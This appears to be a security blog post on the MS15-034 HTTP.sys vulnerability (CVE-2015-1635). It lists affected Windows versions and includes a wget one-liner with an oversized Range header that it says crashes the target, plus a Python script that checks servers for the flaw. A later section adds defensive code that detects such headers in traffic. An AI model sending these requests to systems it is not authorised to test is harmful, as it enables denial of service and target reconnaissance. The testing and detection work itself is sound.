CVE-2015-1635, MS15-034 vulnerability test


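HTTP.sys remote code execution vulnerability (CVE-2015-1635, MS15-034)

A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys). It is caused when HTTP.sys improperly parses specially crafted HTTP requests.

An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account.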

https://technet.microsoft.com/zh-cn/library/security/MS15-034

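A POC for this vulnerability is out; the test follows:

Affected versions:

Windows 2008 R2

Windows Server 2012

Windows 7

Windows 8, 8.1

With IIS 6.0 or later installed. (IIS version > 6.0)

I don't know whether HTTP.sys is used anywhere else, so for now I only know that it affects web servers.

Test POC:

The system is bound to hang or blue-screen: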

wget --header="Range: bytes=18-18446744073709551615" http://192.168.200.49/welcome.png

 https://github.com/yanyueoo7/TestOne/blob/master/CVE-2015-1635.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# date 2015/04/20
# The IIS Vul (CVE-2015-1635, MS15-034) Check Script.
# HTTP.sys Remote Code Execute.

import sys
import requests

def main():
    # The target host or IP is the only argument.
    if len(sys.argv) != 2:
        sys.exit("Usage: %s <ip-or-host>" % sys.argv[0])
    ip_Str = sys.argv[1]
    Check_CVE_2015_1635(ip_Str)

def Check_CVE_2015_1635(Ip_Str):
    if Ip_Str:
        Server_Tag = ['Microsoft-HTTP', 'Microsoft-IIS']
        Tmp_Req_Url = str(''.join(['http://', Ip_Str]))
        Request_Tmp = requests.get(Tmp_Req_Url, timeout=10)
        # The Server header may be missing, so fall back to an empty string.
        remote_server = Request_Tmp.headers.get('server', '')
        # any() is needed here: a bare generator expression is always truthy.
        if any(tmp_tag in remote_server for tmp_tag in Server_Tag):
            print("[+] Web Service Is " + remote_server)
            MS15_034_Execute(Tmp_Req_Url)
        else:
            print("[+] Web Service Is Not IIS\n[+] May Be " + remote_server)

def MS15_034_Execute(domain):
    print("[+] Start Checking...")
    Req_headers = {'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
    Request = requests.get(domain, headers=Req_headers, timeout=10)
    # Use .text (str) rather than .content (bytes) so the substring tests work on Python 3.
    if 'Requested Range Not Satisfiable' in Request.text:
        print("[+] The HTTP.sys remote code execution vulnerability Is Exists!")
    elif 'The request has an invalid header name' in Request.text:
        print("[+] The vulnerability has been fixed!")
    else:
        print("[+] The IIS service was unable to display the vulnerability exists, the need for manual testing!")

if __name__ == '__main__':
    main()
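
Both test requests above carry a Range header whose end offset is 18446744073709551615 (2**64 - 1), which gives a defender something concrete to look for in captured or proxied traffic. The following is an added example, not part of the original post or the linked script: it scans raw HTTP requests for byte ranges with such offsets. The function names, the 2**63 threshold and the sample requests are assumptions constructed for illustration.

```python
import re

# The page's requests use 2**64 - 1 as the end offset.
# Assumption: no real resource has byte offsets of 2**63 or more.
SUSPICIOUS_MIN = 2**63
RANGE_RE = re.compile(r"^\s*bytes\s*=\s*(.+)$", re.IGNORECASE)

def suspicious_ranges(range_value):
    """Return the (start, end) specs of a Range value that carry a huge offset."""
    m = RANGE_RE.match(range_value)
    if not m:
        return []
    hits = []
    for spec in m.group(1).split(","):
        start, sep, end = (p.strip() for p in spec.strip().partition("-"))
        if not sep:
            continue
        # Suffix ranges ("-500") and open ranges ("500-") leave one side empty.
        bounds = [int(b) for b in (start, end) if b.isdecimal()]
        if any(b >= SUSPICIOUS_MIN for b in bounds):
            hits.append((start, end))
    return hits

def scan_request(raw_request):
    """Scan one raw HTTP request (bytes); return suspicious specs from Range headers."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    hits = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "range":   # header names are case-insensitive
            hits.extend(suspicious_ranges(value))
    return hits

# Constructed sample requests: the first two mirror the Range values shown on this page.
SAMPLES = {
    "page_wget": b"GET /welcome.png HTTP/1.1\r\nHost: 192.168.200.49\r\n"
                 b"Range: bytes=18-18446744073709551615\r\n\r\n",
    "page_check": b"GET / HTTP/1.1\r\nHost: stuff\r\n"
                  b"range: BYTES=0-18446744073709551615\r\n\r\n",
    "normal_resume": b"GET /welcome.png HTTP/1.1\r\nHost: example.test\r\n"
                     b"Range: bytes=1024-2047, -500\r\n\r\n",
    "no_range": b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, scan_request(req))
```

A non-empty result is a reason to look at where the request came from and to confirm that the server has the MS15-034 update installed.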
	

  

